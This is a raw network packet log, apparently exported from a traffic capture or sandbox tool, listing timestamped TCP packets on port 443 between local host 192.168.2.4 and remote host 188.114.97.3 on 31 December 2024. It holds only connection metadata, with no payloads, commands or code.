Dec 31, 2024 08:57:14.663718939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.687750101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.687768936 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.687855005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.687855005 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.687863111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.688309908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.688342094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.688397884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.688397884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.688405991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.690618992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.690639019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.690730095 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.690730095 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.690740108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.724752903 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.724766970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.724806070 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.724813938 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.724839926 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.733328104 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733347893 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733376026 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.733381987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733417988 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.733800888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733814955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733855963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.733860970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.733880043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.734144926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.734162092 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.734220982 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.734225988 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.734256029 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.750451088 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.750468969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.750507116 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.750513077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.750617027 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.774513960 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.774533033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.774594069 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.774605036 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.774635077 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.775017023 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.775029898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.775131941 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.775131941 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.775136948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.777427912 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.777446032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.777523041 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.777523041 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.777528048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.811472893 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.811489105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.811590910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.811598063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820008039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820035934 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820106983 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820106983 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820115089 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820420027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820426941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820470095 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820475101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820532084 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820869923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820889950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.820941925 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820941925 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.820950031 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.837166071 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.837178946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.837245941 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.837249994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.837272882 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.861354113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.861372948 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.861421108 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.861427069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.861483097 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.861983061 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.861996889 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.862046003 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.862051964 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.864164114 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.864182949 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.864228010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.864233971 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.864284039 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.898339033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.898353100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.898410082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.898416042 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.898433924 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.906950951 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.906970024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907058954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.907058954 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.907067060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907490969 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907504082 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907541037 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.907545090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907563925 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.907881975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907900095 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907947063 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.907953978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.907975912 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.924060106 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.924072981 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.924150944 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.924150944 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.924159050 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.947981119 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.947999954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.948091030 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.948091030 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.948097944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.948474884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.948487997 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.948523045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.948528051 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.948554993 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.950839043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.950855017 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.950926065 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.950926065 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.950930119 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.985289097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.985304117 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.985367060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:14.985374928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:14.985414028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.000971079 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.000991106 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.001086950 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.001086950 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.001096964 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.003102064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.003108978 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.003187895 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.003192902 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.004760027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.004776955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.004822969 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.004829884 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.004877090 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.023108006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.023121119 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.023169041 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.023173094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.023202896 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.035007954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.035026073 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.035077095 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.035083055 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.035100937 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.035715103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.035739899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.035818100 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.035818100 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.035823107 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.037668943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.037687063 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.037728071 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.037733078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.037755966 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.072273016 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.072287083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.072513103 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.072520018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.087800026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.087817907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.087863922 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.087869883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.087898970 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.089868069 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.089881897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.089926958 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.089931965 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.089956045 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.091689110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.091711998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.091743946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.091747999 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.091773987 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.110157967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.110171080 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.110243082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.110243082 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.110250950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122001886 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122020006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122068882 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.122075081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122097969 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.122558117 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122570992 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122601032 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.122606993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.122626066 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.124536991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.124553919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.124587059 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.124592066 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.124620914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.159018993 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.159030914 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.159113884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.159113884 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.159121037 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.174659014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.174665928 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.174793959 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.174801111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.176626921 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.176640987 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.176703930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.176708937 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.178375006 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.178391933 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.178452015 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.178457975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.196888924 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.196901083 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.196986914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.196991920 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.208825111 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.208842039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.208889961 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.208899975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.208924055 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.209422112 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.209434986 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.209477901 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.209482908 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.209507942 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.211245060 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.211261034 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.211309910 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.211318970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.211328983 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.245841026 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.245855093 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.245923996 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.245923996 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.245930910 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.261523962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.261540890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.261569023 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.261574030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.261593103 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.263345003 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.263359070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.263411999 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.263420105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.265232086 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.265252113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.265288115 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.265292883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.265316010 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.283691883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.283709049 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.283744097 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.283750057 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.283771038 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.295761108 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.295778990 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.295808077 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.295813084 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.295845032 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.296159029 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.296175957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.296231985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.296231985 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.296237946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.298119068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.298134089 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.298166037 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.298168898 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.298194885 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.332618952 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.332633972 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.332699060 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.332704067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.348330975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.348350048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.348376036 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.348382950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.348436117 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.350244999 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.350264072 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.350291014 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.350296974 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.350339890 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.352025032 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.352045059 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.352128029 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.352133989 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.352159023 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.370464087 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.370490074 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.370526075 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.370536089 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.370570898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.382503033 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.382524014 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.382592916 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.382592916 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.382597923 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.383141994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.383152962 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.383213997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.383219957 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.384841919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.384859085 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.384886980 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.384896994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.384922028 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.419526100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.419538975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.419589043 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.419598103 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.419636011 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.435134888 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.435152054 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.435200930 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.435210943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.435240984 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.436994076 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.437006950 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.437038898 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:15.437045097 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:15.437073946 CET	49735	443	192.168.2.4	188.114.97.3
